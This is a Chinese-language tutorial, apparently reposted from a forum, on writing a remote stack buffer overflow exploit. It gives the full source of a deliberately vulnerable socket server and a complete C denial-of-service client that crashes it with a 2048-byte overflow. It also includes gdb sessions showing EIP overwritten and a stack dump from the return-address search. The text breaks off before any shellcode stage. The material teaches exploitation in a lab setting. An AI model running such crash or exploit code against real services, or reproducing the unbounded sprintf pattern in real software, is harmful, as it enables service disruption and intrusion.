怎样写远程缓冲区溢出漏洞利用程序作者：佚名出处：IT 专家网论坛整理 2007-12-18 10:29假设有一个有漏洞的服务器程序(vulnerable.c). 然后写一个 exploit 来 利用该漏洞，这样将能得到一个远程 shell。

一、理解有漏洞程序：#include #include #include #define BUFFER_SIZE 1024 #define NAME_SIZE 2048 int handling(int c) { char buffer[BUFFER_SIZE], name[NAME_SIZE]; int bytes; strcpy(buffer, "My name is: "); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; bytes = recv(c, name, sizeof(name), 0); if (bytes == -1) return -1; name[bytes - 1] = ’\0’; sprintf(buffer, "Hello %s, nice to meet you!\r\n", name); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; return 0; } int main(int argc, char *argv[]) { int s, c, cli_size; struct sockaddr_in srv, cli; if (argc != 2) { fprintf(stderr, "usage: %s port\n", argv[0]); return 1; }s = socket(AF_INET, SOCK_STREAM, 0); if (s == -1) { perror("socket() failed"); return 2; } srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons( (unsigned short int) atol(argv[1])); srv.sin_family = AF_INET; if (bind(s, &srv, sizeof(srv)) == -1) { perror("bind() failed"); return 3; } if (listen(s, 3) == -1) { perror("listen() failed"); return 4; } for(;;) { c = accept(s, &cli, &cli_size); if (c == -1) { perror("accept() failed"); return 5; } printf("client from %s", inet_ntoa(cli.sin_addr)); if (handling(c) == -1) fprintf(stderr, "%s: handling() failed", argv[0]); close(c); } return 0; }下面将编译并运行该程序：user@linux:~/ > gcc vulnerable.c -o vulnerable user@linux:~/ > ./vulnerable 8080 ../vulnerable 8080 说明你能在 8080 端口运行该项服务 user@linux~/ > gdb vulnerable GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, andyou are welcome to change it and/or distribute copies of it under certain con ditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for det ails. This GDB was configured as "i386-suse-linux"... (gdb) run 8080 Starting program: /home/user/directory/vulnerable 8080现在该程序监听 8080 端口并等待连接。

user@linux:~/ > telnet localhost 8080 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is ’^]’. My name is: Robin , nice to meet you! Connection closed by foreign host. user@linux:~/ >看来没有什么破绽，但是这时 gdb 会在屏幕上显示： client from 127.0.0.1 0xbffff28c (访地址因不同机器类型而异) 二、令有漏洞程序发生缓冲区溢出 重新连上该服务，为 "My name is:..." 命令行提供超过 1024 个字节长 的输入:user@linux:~/ > telnet localhost 8080 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is ’^]’. My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA连接将中断，让我们看看 gdb 的输出：Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) // Don’t close gdb !!能够看出 eip 被设到了 0x41414141。

0x41 代表一个"A",当我们输入 1024 个字节时， 该程序会试图将字符串 name[2048]拷入缓冲[1024]。

因此， 由于 name[2048] 大于 1024 字节， name 将会重写缓冲并重写已被存储的 eip，我们的缓冲将会是下列形式：[xxxxxxxx-name-2048-bytes-xxxxxxxxxx] [xxxxx buffer-only-1024-bytes xxx] [EIP] 在你重写了整个返回地址后， 函数将会跳转到错误的地址 0x41414141， 从而产生片断错误。

现在为此程序写一个拒绝服务攻击工具:#include #include #include #include #include int main(int argc, char **argv) { struct sockaddr_in addr; struct hostent *host; char buffer[2048]; int s, i; if(argc != 3) { fprintf(stderr, "usage: %s \n", argv[0]); exit(0); } s = socket(AF_INET, SOCK_STREAM, 0); if(s == -1) { perror("socket() failed\n"); exit(0); } host = gethostbyname(argv[1]); if( host == NULL) { herror("gethostbyname() failed"); exit(0); } addr.sin_addr = *(struct in_addr*)host->h_addr; addr.sin_family = AF_INET; addr.sin_port = htons(atol(argv[2])); if(connect(s, &addr, sizeof(addr)) == -1) { perror("couldn’t connect so server\n");exit(0); } /* Not difficult only filling buffer with A’s.... den sending nothin g more */ for(i = 0; i < 2048 ; i++) buffer[i] = ’A’; printf("buffer is: %s\n", buffer); printf("buffer filled... now sending buffer\n"); send(s, buffer, strlen(buffer), 0); printf("buffer sent.\n"); close(s); return 0; }三、找到返回地址： 打开 gdb 寻找 esp：(gdb) x/200bx $esp-200 0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0xbffff604: 0x41 0x41 0x41 0x41 0x41 0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0xbffff614: 0x41 0x41 0x41 0x41 0x41 0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0xbffff624: 0x41 0x41 0x41 0x41 0x41 0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0xbffff634: 0x41 0x41 0x41 0x41 0x41 0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0xbffff644: 0x41 0x41 0x41 0x41 0x41 0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0xbffff654: 0x41 0x41 0x41 0x41 0x41 0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0xbffff664: 0x41 0x41 0x41 0x41 0x41 0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0xbffff674: 0x41 0x41 0x41 0x41 0x41 0xbffff67c: 0x41 0x41 0x41 0x41 0x41 ---Type to continue, or q to quit--0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41现在我们已经知道重写了整个缓冲，让我们试试几个地址。